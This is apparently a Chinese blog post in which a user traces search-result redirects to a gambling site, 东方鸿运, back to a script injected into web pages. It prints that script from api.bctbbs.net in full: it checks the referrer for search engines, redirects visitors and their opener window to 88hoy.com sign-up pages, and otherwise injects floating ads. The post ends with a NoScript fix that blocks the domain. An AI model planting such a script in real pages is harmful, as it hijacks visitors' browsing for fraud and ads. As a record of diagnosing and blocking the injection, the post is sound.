永别了,东方鸿运

最近通过搜索引擎打开某些网页时总会跳转到东方鸿运的主页上,或者出现东方鸿运的广告,感觉挺烦的,在火狐吧发帖询问后得知是因为网页被注入恶意代码,于是将直接通过url打开网页和与通过搜索引擎打开网页的网页源码做一些diff,得到以下结果:

http://api.bctbbs.net/Seo.js代码:

if (document.cookie.indexOf("lyke") == -1) {
	var exp = new Date();
	exp.setTime(exp.getTime() + 36e5);
	document.cookie = "lyke=1;expires=" + exp.toGMTString();
	var url = document.referrer;
	var robots = ["baidu", "google", "yahoo", "bing", "soso", "sogou", "360.cn", "so.com", "youdao", "jike"];
	for (var i in robots) {
		if (url.indexOf(robots[i]) != -1) {
			if (parent.window.opener) {
				parent.window.opener.location = "http://www.88hoy.com/index1.html?pid=9"
			}
			window.location.href = "http://www.88hoy.com/reg.html?pid=9"
		}
	}
} else {
	document.write("<div id='Left' style='position:absolute;visibility:visible;z-index:999;line-height:100%'><a href='http://www.88hoy.com/reg.html?pid=9&aseo=ads' target='_blank'><img src='http://api.bctbbs.net/Img/Left.gif' width='120' height='300' border='0'></a></div>");
	document.write("<div id='Right' style='position:absolute;visibility:visible;z-index:999;line-height:100%'><a href='http://www.88hoy.com/reg.html?pid=9&aseo=ads' target='_blank'><img src='http://api.bctbbs.net/Img/Right.gif' width='120' height='300' border='0'></a></div>");
	function Lyke() {
		if (!document.ns) {
			var top = document.body.scrollTop;
			if (top == 0) {
				top = document.documentElement.scrollTop
			}
			document.getElementById("Left").style.top = top + 80 + "px";
			document.getElementById("Left").style.left = document.body.scrollLeft + 8 + "px";
			document.getElementById("Right").style.top = top + 80 + "px";
			document.getElementById("Right").style.right = document.body.scrollLeft + 8 + "px"
		}
		setTimeout("Lyke();", 200)
	}
	Lyke()
}

所以屏蔽掉这段js代码就能彻底解决这个问题,这时候忽然想到一个很强大的插件NoScript,安装之后首先alllow script global(否则的话许多网页都得手动开启script allow,比如百度音乐之类的),然后打开会出问题的页面,将bctbbs设为不信任就ok了